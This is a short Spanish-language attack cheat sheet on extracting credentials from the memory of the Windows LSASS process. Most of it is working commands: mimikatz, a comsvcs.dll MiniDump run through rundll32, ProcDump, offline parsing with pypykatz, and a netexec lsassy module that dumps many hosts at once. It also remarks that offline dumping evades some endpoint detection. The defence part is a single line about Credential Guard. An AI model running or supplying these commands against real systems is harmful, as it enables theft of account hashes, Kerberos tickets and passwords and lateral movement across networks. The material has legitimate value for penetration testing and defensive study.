Qué es
Extraer credenciales de LSASS lee la memoria del proceso LSASS de Windows. Recupera los hashes NT, los tickets Kerberos y, a veces, contraseñas en texto plano. Entrega las credenciales de cada cuenta que inició sesión en el host desde el último reinicio.
Cómo funciona
Windows guarda material de autenticación en LSASS para el inicio de sesión único. Así el sistema se autentica a recursos de red sin volver a pedir la contraseña. Leer esa memoria exige SeDebugPrivilege, que trae el administrador local o SYSTEM. El atacante lee LSASS en vivo, o vuelca el proceso a un archivo y lo analiza fuera de línea. El volcado fuera de línea evade parte de la detección del endpoint.
Comandos
Leer LSASS en vivo con mimikatz. Requiere administrador local:
privilege::debug
sekurlsa::logonpasswordsVolcar LSASS con una DLL propia de Windows, sin herramienta externa:
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> <FILE> fullVolcar con ProcDump de Sysinternals:
procdump.exe -accepteula -ma lsass.exe <FILE>Analizar el volcado fuera de línea con mimikatz:
sekurlsa::minidump <FILE>
sekurlsa::logonpasswordsEn Linux, analizar el mismo volcado con pypykatz:
pypykatz lsa minidump <FILE>Volcar LSASS en varios hosts a la vez con netexec:
nxc smb <IP> -u <USER> -p <PASSWORD> -M lsassyCómo defenderse
Activa Credential Guard: aísla el material de credenciales con seguridad basada en virtualización y las lecturas normales de LSASS ya no lo alcanzan.